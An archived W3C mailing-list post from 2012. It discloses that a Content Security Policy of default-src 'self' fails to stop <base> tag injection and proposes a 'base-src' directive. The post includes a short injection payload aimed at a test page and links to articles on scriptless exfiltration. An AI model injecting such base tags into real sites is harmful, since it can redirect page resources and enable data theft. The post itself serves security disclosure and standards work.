W3C home > Mailing lists > Public > public-webappsec@w3.org > October 2012

CSP and <base> Tag Injection + Suggestion for New CSP Directive "base-src" in CSP 1.1

From: Ashar Javed <justashar@gmail.com>
Date: Mon, 15 Oct 2012 18:32:26 +0200
Message-ID: <CAD5mSqWRg665Ng5HRS07PkRAeNUCe_zTe3z5hpbVq7UL5mPc4A@mail.gmail.com>
To: public-webappsec@w3.org
Cc: Adam Barth <abarth@webkit.org>
Hi,

Even if site is using 'self' CSP policy for all types of resources,
attacker can still inject *<base>* tag and CSP can not stop it. e.g.,

On testing environment:
http://www.mobilefuxx.de/csp/xsstest/test_unsafe.php, you may set the
following CSP header as an example:

default-src 'self';

and in the allowed injection area, inject:

<BASE HREF="http://www.google.com/logos/">
<img src="classicplus.png">

Now click "*Submit Attack*" button ... nothing happens but behind the scene
chrome has changed the base URL. You can see the new URL by clicking
the "*Submit
Attack*" button again and the URL now you have is:

http://www.google.com/csp/xsstest/test_unsafe.php

I think or I would like to suggest that CSP 1.1 would have also *base-src
'self' directive* in order to stop base tag injection. At the same time I
would also like to point out few posts related to base tag and how attacker
can use this to ex-filtrate information. Thanks!

http://lcamtuf.coredump.cx/postxss/
http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/
http://avuko.net/

Reference Bug: https://bugs.webkit.org/show_bug.cgi?id=99318

Thanks!

Best Regards,

ashar
Received on Monday, 15 October 2012 16:35:03 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Monday, 15 October 2012 16:35:04 GMT